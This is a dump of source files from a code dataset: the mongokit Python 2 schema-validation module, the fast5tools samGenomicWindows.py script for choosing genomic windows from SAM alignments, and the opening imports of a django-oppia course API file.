# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE REGENTS AND CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import bson
import datetime
import logging
from copy import deepcopy
log = logging.getLogger(__name__)
from mongokit.operators import SchemaOperator, IS
from mongokit.helpers import DotCollapsedDict
from mongokit.helpers import DotExpandedDict
from mongokit.helpers import i18nDotedDict
from mongokit.helpers import DotedDict
__all__ = [
'AuthorizedTypeError',
'BadKeyError',
'CustomType',
'DefaultFieldTypeError',
'DotCollapsedDict',
'DotedDict',
'DotExpandedDict',
'DuplicateDefaultValueError',
'DuplicateRequiredError',
'i18n',
'i18nError',
'ModifierOperatorError',
'RequireFieldError',
'SchemaDocument',
'SchemaDocumentError',
'SchemaProperties',
'SchemaTypeError',
'Set',
'StructureError',
'ValidationError',
]
class CustomType(object):
init_type = None
mongo_type = None
python_type = None
def __init__(self):
if self.mongo_type is None:
raise TypeError("`mongo_type` property must be specify in %s" %
self.__class__.__name__)
if self.python_type is None:
raise TypeError("`python_type` property must be specify in %s" %
self.__class__.__name__)
def to_bson(self, value):
"""convert type to a mongodb type"""
raise NotImplementedError
def to_python(self, value):
"""convert type to a mongodb type"""
raise NotImplementedError
def validate(self, value, path):
"""
        This method is optional. It adds a validation layer.
        This method is called in Document.validate()
value: the value of the field
path: the field name (ie, 'foo' or 'foo.bar' if nested)
"""
pass
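# Illustrative sketch only (not part of the original module): a minimal CustomType subclass that
# stores python datetime.date values as datetime.datetime in MongoDB. The class name and the
# choice of date handling are assumptions made purely for demonstration.
class _ExampleDateType(CustomType):
    mongo_type = datetime.datetime
    python_type = datetime.date
    def to_bson(self, value):
        # called when saving: convert the python value into something MongoDB can store
        if value is not None:
            return datetime.datetime(value.year, value.month, value.day)
    def to_python(self, value):
        # called when loading: convert the stored value back into the python representation
        if value is not None:
            return value.date()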
# fields which do not need to be declared in the structure
STRUCTURE_KEYWORDS = []
class SchemaDocumentError(Exception):
pass
class RequireFieldError(SchemaDocumentError):
pass
class StructureError(SchemaDocumentError):
pass
class BadKeyError(SchemaDocumentError):
pass
class AuthorizedTypeError(SchemaDocumentError):
pass
class ValidationError(SchemaDocumentError):
pass
class DuplicateRequiredError(SchemaDocumentError):
pass
class DuplicateDefaultValueError(SchemaDocumentError):
pass
class ModifierOperatorError(SchemaDocumentError):
pass
class SchemaTypeError(SchemaDocumentError):
pass
class DefaultFieldTypeError(SchemaDocumentError):
pass
class i18nError(SchemaDocumentError):
pass
class DeprecationError(Exception):
pass
class DuplicateI18nError(Exception):
pass
class SchemaProperties(type):
def __new__(mcs, name, bases, attrs):
attrs['_protected_field_names'] = set(
['_protected_field_names', '_namespaces', '_required_namespace'])
for base in bases:
parent = base.__mro__[0]
if not hasattr(parent, 'structure'):
continue
if parent.structure is not None:
#parent = parent()
if parent.structure:
if 'structure' not in attrs and parent.structure:
attrs['structure'] = parent.structure.copy()
else:
obj_structure = attrs.get('structure', {}).copy()
attrs['structure'] = parent.structure.copy()
attrs['structure'].update(obj_structure)
if parent.required_fields:
attrs['required_fields'] = list(set(
attrs.get('required_fields', [])+parent.required_fields))
if parent.default_values:
obj_default_values = attrs.get('default_values', {}).copy()
attrs['default_values'] = parent.default_values.copy()
attrs['default_values'].update(obj_default_values)
if parent.validators:
obj_validators = attrs.get('validators', {}).copy()
attrs['validators'] = parent.validators.copy()
attrs['validators'].update(obj_validators)
if parent.i18n:
attrs['i18n'] = list(set(
attrs.get('i18n', [])+parent.i18n))
if attrs.get('authorized_types'):
attrs['authorized_types'] = list(set(parent.authorized_types).union(set(attrs['authorized_types'])))
for mro in bases[0].__mro__:
attrs['_protected_field_names'] = attrs['_protected_field_names'].union(list(mro.__dict__))
attrs['_protected_field_names'] = list(attrs['_protected_field_names'])
if attrs.get('structure') and name not in \
["SchemaDocument", "Document", "VersionedDocument", "RevisionDocument"]:
base = bases[0]
if not attrs.get('authorized_types'):
attrs['authorized_types'] = base.authorized_types
base._validate_structure(attrs['structure'], name, attrs.get('authorized_types'))
attrs['_namespaces'] = list(base._SchemaDocument__walk_dict(attrs['structure']))
if [1 for i in attrs['_namespaces'] if type(i) is type]:
raise DeprecationError("%s: types are not allowed as structure key anymore" % name)
mcs._validate_descriptors(attrs)
## building required fields namespace
attrs['_required_namespace'] = set([])
for rf in attrs.get('required_fields', []):
splited_rf = rf.split('.')
for index in range(len(splited_rf)):
attrs['_required_namespace'].add(".".join(splited_rf[:index+1]))
attrs['_collapsed_struct'] = DotCollapsedDict(attrs['structure'], remove_under_type=True)
elif attrs.get('structure') is not None and name not in \
["SchemaDocument", "Document", "VersionedDocument", "RevisionDocument"]:
attrs['_collapsed_struct'] = {}
attrs['_i18n_namespace'] = []
if attrs.get('i18n'):
attrs['_i18n_namespace'] = set(['.'.join(i.split('.')[:-1]) for i in attrs['i18n']])
return type.__new__(mcs, name, bases, attrs)
@classmethod
def _validate_descriptors(mcs, attrs):
# TODO i18n validator
for dv in attrs.get('default_values', {}):
if not dv in attrs['_namespaces']:
raise ValueError("Error in default_values: can't find %s in structure" % dv)
for required in attrs.get('required_fields', []):
if required not in attrs['_namespaces']:
raise ValueError("Error in required_fields: can't find %s in structure" % required)
for validator in attrs.get('validators', {}):
if validator not in attrs['_namespaces']:
raise ValueError("Error in validators: can't find %s in structure" % validator)
# required_field
if attrs.get('required_fields'):
if len(attrs['required_fields']) != len(set(attrs['required_fields'])):
raise DuplicateRequiredError("duplicate required_fields : %s" % attrs['required_fields'])
# i18n
if attrs.get('i18n'):
if len(attrs['i18n']) != len(set(attrs['i18n'])):
raise DuplicateI18nError("duplicated i18n : %s" % attrs['i18n'])
for _i18n in attrs['i18n']:
if _i18n not in attrs['_namespaces']:
raise ValueError("Error in i18n: can't find {} in structure".format(_i18n))
class SchemaDocument(dict):
"""
    A SchemaDocument is a dictionary with a built-in structured schema.
    The validate method will check that the document matches the underlying
    structure. A structure must be specified in each SchemaDocument.
>>> class TestDoc(SchemaDocument):
... structure = {
... "foo":unicode,
... "bar":int,
... "nested":{
... "bla":float}}
`unicode`, `int`, `float` are python types listed in `mongokit.authorized_types`.
>>> doc = TestDoc()
>>> doc
{'foo': None, 'bar': None, 'nested': {'bla': None}}
A SchemaDocument works just like dict:
>>> doc['bar'] = 3
>>> doc['foo'] = "test"
    We can describe fields as required with the required_fields attribute:
>>> TestDoc.required_fields = ['bar', 'nested.bla']
>>> doc = TestDoc()
>>> doc['bar'] = 2
Validation is made with the `validate()` method:
>>> doc.validate() # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
RequireFieldError: nested.bla is required
Default values can be set by using the attribute default_values :
>>> TestDoc.default_values = {"bar":3, "nested.bla":2.0}
>>> doc = TestDoc()
>>> doc
{'foo': None, 'bar': 3, 'nested': {'bla': 2.0}}
>>> doc.validate()
Validators can be added in order to validate some values :
>>> TestDoc.validators = {"bar":lambda x: x>0, "nested.bla": lambda x: x<0}
>>> doc = TestDoc()
>>> doc['bar'] = 3
>>> doc['nested']['bla'] = 2.0
>>> doc.validate()
Traceback (most recent call last):
...
ValidationError: nested.bla does not pass the validator <lambda>
If you want to use the dot notation (ala json), you must set the
`use_dot_notation` attribute to True:
>>> class TestDotNotation(SchemaDocument):
... structure = {
... "foo":{ "bar":unicode}
... }
... use_dot_notation=True
>>> doc = TestDotNotation()
>>> doc.foo.bar = u"bla"
>>> doc
{"foo":{"bar":u"bla}}
"""
__metaclass__ = SchemaProperties
structure = None
required_fields = []
default_values = {}
validators = {}
i18n = []
raise_validation_errors = True
skip_validation = False
# if you want to have all schemaless benefits (default False but should change)
# warning, if use_schemaless is True, Migration features can not be used.
use_schemaless = False
# If you want to use the dot notation, set this to True:
use_dot_notation = False
dot_notation_warning = False
authorized_types = [
type(None),
bool,
int,
long,
float,
unicode,
basestring,
list,
dict,
datetime.datetime,
bson.binary.Binary,
CustomType,
]
def __init__(self, doc=None, gen_skel=True, _gen_auth_types=True, _validate=True, lang='en', fallback_lang='en'):
"""
doc : a dictionary
gen_skel : if True, generate automatically the skeleton of the doc
filled with NoneType each time validate() is called. Note that
if doc is not {}, gen_skel is always False. If gen_skel is False,
default_values cannot be filled.
gen_auth_types: if True, generate automatically the self.authorized_types
attribute from self.authorized_types
"""
super(SchemaDocument, self).__init__()
if self.structure is None:
self.structure = {}
self._current_lang = lang
self._fallback_lang = fallback_lang
self.validation_errors = {}
# init
if doc:
for k, v in doc.iteritems():
self[k] = v
gen_skel = False
if gen_skel:
self.generate_skeleton()
if self.default_values:
self._set_default_fields(self, self.structure)
else:
self._process_custom_type('python', self, self.structure)
if self.use_dot_notation:
self.__generate_doted_dict(self, self.structure)
if self.i18n:
self._make_i18n()
def generate_skeleton(self):
"""
validate and generate the skeleton of the document
from the structure (unknown values are set to None)
"""
self.__generate_skeleton(self, self.structure)
def validate(self):
"""
validate the document.
This method will verify if :
        * the doc follows the structure,
* all required fields are filled
Additionally, this method will process all
validators.
"""
if self.validators:
self._process_validators(self, self.structure)
self._process_custom_type('bson', self, self.structure)
self._validate_doc(self, self.structure)
self._process_custom_type('python', self, self.structure)
if self.required_fields:
self._validate_required(self, self.structure)
def __setattr__(self, key, value):
if key not in self._protected_field_names and self.use_dot_notation and key in self:
if isinstance(self.structure[key], i18n):
self[key][self._current_lang] = value
else:
self[key] = value
else:
if self.dot_notation_warning and not key.startswith('_') and key not in \
['db', 'collection', 'versioning_collection', 'connection', 'fs']:
log.warning("dot notation: {} was not found in structure. Add it as attribute instead".format(key))
dict.__setattr__(self, key, value)
def __getattr__(self, key):
if key not in self._protected_field_names and self.use_dot_notation and key in self:
if isinstance(self[key], i18n):
if self._current_lang not in self[key]:
return self[key].get(self._fallback_lang)
return self[key][self._current_lang]
return self[key]
else:
return dict.__getattribute__(self, key)
#
# Public API end
#
@classmethod
def __walk_dict(cls, dic):
# thanks jean_b for the patch
for key, value in dic.items():
if isinstance(value, dict) and len(value):
if type(key) is type:
yield '$%s' % key.__name__
else:
yield key
for child_key in cls.__walk_dict(value):
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
#if type(child_key) is type:
# new_child_key = "$%s" % child_key.__name__
#else:
if type(child_key) is not type:
new_child_key = child_key
yield '%s.%s' % (new_key, new_child_key)
elif type(key) is type:
yield '$%s' % key.__name__
# elif isinstance(value, list) and len(value):
# if isinstance(value[0], dict):
# for child_key in cls.__walk_dict(value[0]):
# #if type(key) is type:
# # new_key = "$%s" % key.__name__
# #else:
# if type(key) is not type:
# new_key = key
# #if type(child_key) is type:
# # new_child_key = "$%s" % child_key.__name__
# #else:
# if type(child_key) is not type:
# new_child_key = child_key
# yield '%s.%s' % (new_key, new_child_key)
# else:
# if type(key) is not type:
# yield key
# #else:
# # yield ""
else:
if type(key) is not type:
yield key
#else:
# yield ""
@classmethod
def _validate_structure(cls, structure, name, authorized_types):
"""
validate if all fields in self.structure are in authorized types.
"""
##############
def __validate_structure(struct, name, _authorized):
if type(struct) is type:
                if struct not in authorized_types:
                    raise StructureError("%s: %s is not an authorized type" % (name, struct))
elif isinstance(struct, dict):
for key in struct:
if isinstance(key, basestring):
if "." in key:
raise BadKeyError("%s: %s must not contain '.'" % (name, key))
if key.startswith('$'):
raise BadKeyError("%s: %s must not start with '$'" % (name, key))
elif type(key) is type:
if not key in authorized_types:
raise AuthorizedTypeError("%s: %s is not an authorized type" % (name, key))
else:
raise StructureError("%s: %s must be a basestring or a type" % (name, key))
if struct[key] is None:
pass
elif isinstance(struct[key], dict):
__validate_structure(struct[key], name, authorized_types)
elif isinstance(struct[key], list):
__validate_structure(struct[key], name, authorized_types)
elif isinstance(struct[key], tuple):
__validate_structure(struct[key], name, authorized_types)
elif isinstance(struct[key], CustomType):
__validate_structure(struct[key].mongo_type, name, authorized_types)
elif isinstance(struct[key], SchemaProperties):
pass
elif isinstance(struct[key], SchemaOperator):
__validate_structure(struct[key], name, authorized_types)
elif hasattr(struct[key], 'structure'):
__validate_structure(struct[key], name, authorized_types)
elif struct[key] not in authorized_types:
ok = False
for auth_type in authorized_types:
if struct[key] is None:
ok = True
else:
try:
if isinstance(struct[key], auth_type) or issubclass(struct[key], auth_type):
ok = True
except TypeError:
raise TypeError("%s: %s is not a type" % (name, struct[key]))
if not ok:
raise StructureError(
"%s: %s is not an authorized type" % (name, struct[key]))
elif isinstance(struct, list) or isinstance(struct, tuple):
for item in struct:
__validate_structure(item, name, authorized_types)
elif isinstance(struct, SchemaOperator):
if isinstance(struct, IS):
for operand in struct:
if type(operand) not in authorized_types:
raise StructureError("%s: %s in %s is not an authorized type (%s found)" % (
name, operand, struct, type(operand).__name__))
else:
for operand in struct:
if operand not in authorized_types:
raise StructureError("%s: %s in %s is not an authorized type (%s found)" % (
name, operand, struct, type(operand).__name__))
elif isinstance(struct, SchemaProperties):
pass
else:
ok = False
for auth_type in authorized_types:
if isinstance(struct, auth_type):
ok = True
if not ok:
raise StructureError("%s: %s is not an authorized_types" % (name, struct))
#################
if structure is None:
raise StructureError("%s.structure must not be None" % name)
if not isinstance(structure, dict):
raise StructureError("%s.structure must be a dict instance" % name)
__validate_structure(structure, name, authorized_types)
def _raise_exception(self, exception, field, message):
if self.raise_validation_errors:
raise exception(message)
else:
if not field in self.validation_errors:
self.validation_errors[field] = []
self.validation_errors[field].append(exception(message))
def _validate_doc(self, doc, struct, path=""):
"""
check if doc field types match the doc field structure
"""
if type(struct) is type or struct is None:
if struct is None:
if type(doc) not in self.authorized_types:
self._raise_exception(AuthorizedTypeError, type(doc).__name__,
"%s is not an authorized types" % type(doc).__name__)
elif not isinstance(doc, struct) and doc is not None:
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of %s not %s" % (
path, struct.__name__, type(doc).__name__))
elif isinstance(struct, CustomType):
if not isinstance(doc, struct.mongo_type) and doc is not None:
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of %s not %s" % (
path, struct.mongo_type.__name__, type(doc).__name__))
struct.validate(doc, path=path)
elif isinstance(struct, SchemaOperator):
if not struct.validate(doc) and doc is not None:
if isinstance(struct, IS):
self._raise_exception(SchemaTypeError, path,
"%s must be in %s not %s" % (path, struct._operands, doc))
else:
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of %s not %s" % (path, struct, type(doc).__name__))
elif isinstance(struct, dict):
if not isinstance(doc, type(struct)):
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of %s not %s" % (
path, type(struct).__name__, type(doc).__name__))
struct_length = len(struct) if not '_id' in struct else len(struct) - 1
if len(doc) != struct_length:
struct_doc_diff = list(set(struct).difference(set(doc)))
if struct_doc_diff:
for field in struct_doc_diff:
if (type(field) is not type) and (not self.use_schemaless):
self._raise_exception(StructureError, None,
"missed fields %s in %s" % (struct_doc_diff, type(doc).__name__))
else:
struct_struct_diff = list(set(doc).difference(set(struct)))
bad_fields = [s for s in struct_struct_diff if s not in STRUCTURE_KEYWORDS]
if bad_fields and not self.use_schemaless:
self._raise_exception(StructureError, None,
"unknown fields %s in %s" % (bad_fields, type(doc).__name__))
for key in struct:
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
if new_key.split('.')[-1].startswith("$"):
for doc_key in doc:
if not isinstance(doc_key, key):
self._raise_exception(SchemaTypeError, path,
"key of %s must be an instance of %s not %s" % (
path, key.__name__, type(doc_key).__name__))
self._validate_doc(doc[doc_key], struct[key], new_path)
else:
if key in doc:
self._validate_doc(doc[key], struct[key], new_path)
elif isinstance(struct, list):
if not isinstance(doc, list) and not isinstance(doc, tuple):
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of list not %s" % (path, type(doc).__name__))
if not len(struct):
struct = None
else:
struct = struct[0]
for obj in doc:
self._validate_doc(obj, struct, path)
elif isinstance(struct, tuple):
if not isinstance(doc, list) and not isinstance(doc, tuple):
self._raise_exception(SchemaTypeError, path,
"%s must be an instance of list not %s" % (
path, type(doc).__name__))
if len(doc) != len(struct):
self._raise_exception(SchemaTypeError, path, "%s must have %s items not %s" % (
path, len(struct), len(doc)))
for i in range(len(struct)):
self._validate_doc(doc[i], struct[i], path)
def _process_validators(self, doc, _struct, _path=""):
doted_doc = DotCollapsedDict(doc)
for key, validators in self.validators.iteritems():
if key in doted_doc and doted_doc[key] is not None:
if not hasattr(validators, "__iter__"):
validators = [validators]
for validator in validators:
try:
if not validator(doted_doc[key]):
raise ValidationError("%s does not pass the validator " + validator.__name__)
except Exception, e:
self._raise_exception(ValidationError, key,
unicode(e) % key)
def _process_custom_type(self, target, doc, struct, path="", root_path=""):
for key in struct:
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
#
            # if the value is a dict, we have another structure to validate
#
#
# It is not a dict nor a list but a simple key:value
#
if isinstance(struct[key], CustomType):
if target == 'bson':
if key in doc:
if struct[key].python_type is not None:
if not isinstance(doc[key], struct[key].python_type) and doc[key] is not None:
self._raise_exception(SchemaTypeError, new_path,
"%s must be an instance of %s not %s" % (
new_path, struct[key].python_type.__name__,
type(doc[key]).__name__))
doc[key] = struct[key].to_bson(doc[key])
else:
if key in doc:
doc[key] = struct[key].to_python(doc[key])
elif isinstance(struct[key], dict):
if doc: # we don't need to process an empty doc
if type(key) is type:
for doc_key in doc: # process type's key such {unicode:int}...
self._process_custom_type(target, doc[doc_key], struct[key], new_path, root_path)
else:
if key in doc: # we don't care about missing fields
self._process_custom_type(target, doc[key], struct[key], new_path, root_path)
#
# If the struct is a list, we have to validate all values into it
#
elif type(struct[key]) is list:
#
# check if the list must not be null
#
if struct[key]:
l_objs = []
if isinstance(struct[key][0], CustomType):
for obj in doc[key]:
if target == 'bson':
if struct[key][0].python_type is not None:
if not isinstance(obj, struct[key][0].python_type) and obj is not None:
self._raise_exception(SchemaTypeError, new_path,
"%s must be an instance of %s not %s" % (
new_path, struct[key][0].python_type.__name__,
type(obj).__name__))
obj = struct[key][0].to_bson(obj)
else:
obj = struct[key][0].to_python(obj)
l_objs.append(obj)
doc[key] = l_objs
elif isinstance(struct[key][0], dict):
if doc.get(key):
for obj in doc[key]:
self._process_custom_type(target, obj, struct[key][0], new_path, root_path)
def _set_default_fields(self, doc, struct, path=""):
# TODO check this out, this method must be restructured
for key in struct:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
#
            # default_values:
            # if the value is None, check whether a default value exists.
            # If one exists and it is callable, call it; otherwise,
            # just use it as-is.
#
if type(key) is not type:
if doc[key] is None and new_path in self.default_values:
new_value = self.default_values[new_path]
if callable(new_value):
new_value = new_value()
elif isinstance(new_value, dict):
new_value = deepcopy(new_value)
elif isinstance(new_value, list):
new_value = new_value[:]
if isinstance(struct[key], CustomType):
if not isinstance(new_value, struct[key].python_type):
self._raise_exception(DefaultFieldTypeError, new_path,
"%s must be an instance of %s not %s" % (
new_path, struct[key].python_type.__name__,
type(new_value).__name__))
doc[key] = new_value
#
            # if the value is a dict, we have another structure to validate
#
if isinstance(struct[key], dict) and new_path not in self.i18n:
#
                # if the dict is still empty in the document we build
# it with None values
#
if len(struct[key]) and not [i for i in struct[key].keys() if type(i) is type]:
self._set_default_fields(doc[key], struct[key], new_path)
else:
if new_path in self.default_values:
new_value = self.default_values[new_path]
if callable(new_value):
new_value = new_value()
elif isinstance(new_value, dict):
new_value = deepcopy(new_value)
elif isinstance(new_value, list):
new_value = new_value[:]
doc[key] = new_value
elif isinstance(struct[key], list):
if new_path in self.default_values:
for new_value in self.default_values[new_path]:
if callable(new_value):
new_value = new_value()
elif isinstance(new_value, dict):
new_value = deepcopy(new_value)
elif isinstance(new_value, list):
new_value = new_value[:]
if isinstance(struct[key][0], CustomType):
if not isinstance(new_value, struct[key][0].python_type):
self._raise_exception(DefaultFieldTypeError, new_path,
"%s must be an instance of %s not %s" % (
new_path, struct[key][0].python_type.__name__,
type(new_value).__name__))
doc[key].append(new_value)
else: # what else
if new_path in self.default_values:
new_value = self.default_values[new_path]
if callable(new_value):
new_value = new_value()
elif isinstance(new_value, dict):
new_value = deepcopy(new_value)
elif isinstance(new_value, list):
new_value = new_value[:]
if new_path in self.i18n:
doc[key] = i18n(
field_type=struct[key],
field_name=key
)
doc[key].update(new_value)
else:
doc[key] = new_value
def _validate_required(self, doc, _struct, _path="", _root_path=""):
doted_struct = DotCollapsedDict(self.structure)
doted_doc = DotCollapsedDict(doc, reference=doted_struct)
for req in self.required_fields:
if doted_doc.get(req) is None and doted_struct.get(req) is not dict:
if not isinstance(doted_struct.get(req), CustomType):
self._raise_exception(RequireFieldError, req, "%s is required" % req)
elif isinstance(doted_struct.get(req), CustomType) and doted_struct[req].mongo_type is not dict:
self._raise_exception(RequireFieldError, req, "%s is required" % req)
elif doted_doc.get(req) == []:
self._raise_exception(RequireFieldError, req, "%s is required" % req)
elif doted_doc.get(req) == {}:
self._raise_exception(RequireFieldError, req, "%s is required" % req)
def __generate_skeleton(self, doc, struct, path=""):
for key in struct:
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
#
            # Automatically generate the skeleton with NoneType
#
if type(key) is not type and key not in doc:
if isinstance(struct[key], dict):
if type(struct[key]) is dict and self.use_dot_notation:
if new_path in self._i18n_namespace:
doc[key] = i18nDotedDict(doc.get(key, {}), self)
else:
doc[key] = DotedDict(doc.get(key, {}), warning=self.dot_notation_warning)
else:
if callable(struct[key]):
doc[key] = struct[key]()
else:
doc[key] = type(struct[key])()
elif struct[key] is dict:
doc[key] = {}
elif isinstance(struct[key], list):
doc[key] = type(struct[key])()
elif isinstance(struct[key], CustomType):
if struct[key].init_type is not None:
doc[key] = struct[key].init_type()
else:
doc[key] = None
elif struct[key] is list:
doc[key] = []
elif isinstance(struct[key], tuple):
doc[key] = [None for _ in range(len(struct[key]))]
else:
doc[key] = None
#
            # if the value is a dict, we have another structure to validate
#
if isinstance(struct[key], dict) and type(key) is not type:
self.__generate_skeleton(doc[key], struct[key], new_path)
def __generate_doted_dict(self, doc, struct, path=""):
for key in struct:
#
            # Automatically generate the skeleton with NoneType
#
if type(key) is type:
new_key = "$%s" % key.__name__
else:
new_key = key
new_path = ".".join([path, new_key]).strip('.')
if type(key) is not type: # and key not in doc:
if isinstance(struct[key], dict):
if type(struct[key]) is dict:
if new_path in self._i18n_namespace:
doc[key] = i18nDotedDict(doc.get(key, {}), self)
else:
doc[key] = DotedDict(doc.get(key, {}), warning=self.dot_notation_warning)
#
            # if the value is a dict, we have another structure to validate
#
if isinstance(struct[key], dict) and type(key) is not type:
self.__generate_doted_dict(doc[key], struct[key], new_path)
def _make_i18n(self):
doted_dict = DotCollapsedDict(self.structure)
for field in self.i18n:
if field not in doted_dict:
self._raise_exception(ValidationError, field,
"%s not found in structure" % field)
if not isinstance(doted_dict[field], i18n):
doted_dict[field] = i18n(
field_type=doted_dict[field],
field_name=field
)
self.structure.update(DotExpandedDict(doted_dict))
def set_lang(self, lang):
self._current_lang = lang
def get_lang(self):
return self._current_lang
class i18n(dict, CustomType):
""" CustomType to deal with i18n """
mongo_type = list
def __init__(self, field_type=None, field_name=None):
super(i18n, self).__init__()
self.python_type = self.__class__
self._field_type = field_type
self._field_name = field_name
def __call__(self):
return i18n(self._field_type, self._field_name)
def to_bson(self, value):
if value is not None:
for l, v in value.iteritems():
if isinstance(v, list) and isinstance(self._field_type, list):
for i in v:
if not isinstance(i, self._field_type[0]):
raise SchemaTypeError("%s (%s) must be an instance of %s not %s" % (
self._field_name, l, self._field_type[0], type(i).__name__))
else:
if not isinstance(v, self._field_type):
raise SchemaTypeError("%s (%s) must be an instance of %s not %s" % (
self._field_name, l, self._field_type, type(v).__name__))
return [{'lang': l, 'value': v} for l, v in value.iteritems()]
def to_python(self, value):
if value is not None:
i18n_dict = self.__class__(self._field_type)
for i in value:
i18n_dict[i['lang']] = i['value']
return i18n_dict
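    # For reference (illustrative values only), the two converters above map between
    # the python-side dict and the bson-side list of documents:
    #   to_bson({'en': u'hello', 'fr': u'bonjour'}) -> [{'lang': 'en', 'value': u'hello'},
    #                                                   {'lang': 'fr', 'value': u'bonjour'}]
    #   to_python([{'lang': 'en', 'value': u'hello'}]) -> i18n dict {'en': u'hello'}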
class Set(CustomType):
""" SET custom type to handle python set() type """
init_type = set
mongo_type = list
python_type = set
def __init__(self, structure_type=None):
super(Set, self).__init__()
self._structure_type = structure_type
def to_bson(self, value):
if value is not None:
return list(value)
def to_python(self, value):
if value is not None:
return set(value)
def validate(self, value, path):
if value is not None and self._structure_type is not None:
for val in value:
if not isinstance(val, self._structure_type):
raise ValueError('%s must be an instance of %s not %s' %
(path, self._structure_type.__name__, type(val).__name__))
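# Illustrative sketch only (hypothetical structure, not part of this module): a Set
# field is typically declared in a document structure and round-tripped with the
# converters above, e.g.
#   structure = {'tags': Set(unicode)}
#   Set(unicode).to_bson(set([u'a', u'b']))  # -> [u'a', u'b'] (a list, for mongo)
#   Set(unicode).to_python([u'a', u'b'])     # -> set([u'a', u'b'])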
| bsd-3-clause | 3,304,417,042,122,618,000 | 42.996907 | 117 | 0.506455 | false |
JohnUrban/fast5tools | bin/samGenomicWindows.py | 1 | 5426 | #!/usr/bin/env python2.7
import argparse
from collections import defaultdict
from fast5tools.samclass import *
from fast5tools.samops import *
parser = argparse.ArgumentParser(description="""
DESCRIPTION
Given a SAM file (with F5:Z: info attached) that is sorted by read name:
- get the alignment or set of splitread alignments for each read
    - determine the most likely genomic region the read came from (assuming no structural variation)
- if one alignment, assume it comes from there
- if multiple alignments,
check for overlap of their individual genomic windows (alignment adjusted for clipping on each side + flank/buffer)
if no merges,
use majority or longest alignment (majority is longest alignment that also meets a majority threshold)
if there is a single merge -- i.e. they all come from same genomic region (and perhaps required to be ordered and stranded - see options) -
use merged result from merged genomic windows
if there is 1 or more merges (but still more than 1 genomic region)
see if longest merge has a 'spanning alignment' longer than longest/majority alignment
if so use that, if not use the longest/majority alignment
- report on alignments and merges in all cases
- get coordinates for a window that surrounds that chosen genomic region
- this is the chosen genomic window for that read
- coordinates for genomic window should be proportional to read length + some extra buffering/flanking sequence
- print out gw coordinates, notes on choice, F5 info, and perhaps genomic sequence chosen
flank=0.25, merge_dist=0, majority=0.5, require_order=False, require_strand=False, reference=False
flank = Add buffer/flank lengths to each side of a genomic window in two ways:
(1) int > 1 adds/subtracts that int.
(2) float [0,1] adds/subtracts that proportion of read length
NOTE: 1 defaults to 100% of read length, not 1 bp
merge_dist:
allows a gap up to d between intervals to still be an overlap - default 0
majority
threshold to exceed to be considered a majority.
require_order
when True, alignments must be ordered as they appear in the read to be considered a valid merge.
Defaults to False as noisy alignments could easily break this. Status is reported in output anyway.
require_strand
when True, alignments must ALL be on the same strand to be considered a valid merge.
Defaults to False as noisy alignments could easily break this. Status is reported in output anyway.
""", formatter_class= argparse.RawTextHelpFormatter)
parser_input = parser.add_mutually_exclusive_group(required=True)
parser_input.add_argument('--sam', '-s',
type= str, default=False,
help='''Input file in SAM format.''')
## FOR NOW, MUST BE SAM -- NOT BAM -- but can be STDIN SAM
##parser_input.add_argument('--bam', '-b',
## type= str, default=False,
## help='''Input file in BAM format.''')
parser.add_argument('--flank', '-f', type=float, default=0.25,
help=''' ''')
parser.add_argument('--merge_dist', '-m', type=int, default=0,
help=''' ''')
parser.add_argument('--majority', '-M', type=float, default=0.5,
help=''' ''')
parser.add_argument('--require_order', '-ro', action='store_true', default=False,
help=''' ''')
parser.add_argument('--require_strand', '-rs', action='store_true', default=False,
help=''' ''')
parser.add_argument('--reference', '-r', type=str, default=False,
help=''' Path to reference genome file to be used to extract sequences corresponding to genomic windows identified.
Optional. Sequences will be tagged on to an additional end column if provided.''')
parser.add_argument('--getF5info', '-f5', action='store_true', default=False,
help='''Return F5:Z: field from fast5tools in output.
This is from extracting fasta/fastq using fast5tofastx.py with --comments and --samflag''')
parser.add_argument('--getBCinfo', '-BC', action='store_true', default=False,
help=''' Return BC:Z: field from fast5tools in output.
This is from creating fasta/fastq from output of fast5_sw_bardecoder.py specified with --sequence/--quals,
and merging all desired barcode info into string following BC:Z:''')
parser.add_argument('--do_not_adjust_window_for_clipping', '-noadjust', action='store_true', default=False,
help=''' By default, the genomic window is pushed out at least as far as it would need to be to include soft/hard clipped regions at 5'/3' ends. This turns it off.''')
args = parser.parse_args()
get_genomic_windows(samfilepath=args.sam, flank=args.flank, merge_dist=args.merge_dist, majority=args.majority, require_order=args.require_order, require_strand=args.require_strand, reference=args.reference, getF5field=args.getF5info, getBCfield=args.getBCinfo, adjust_for_clipping_in_output=(not args.do_not_adjust_window_for_clipping))
| mit | 6,325,595,526,689,239,000 | 51.679612 | 337 | 0.651861 | false |
DigitalCampus/django-oppia | api/resources/course.py | 1 | 9945 | import json
import os
import re
import shutil
import xmltodict
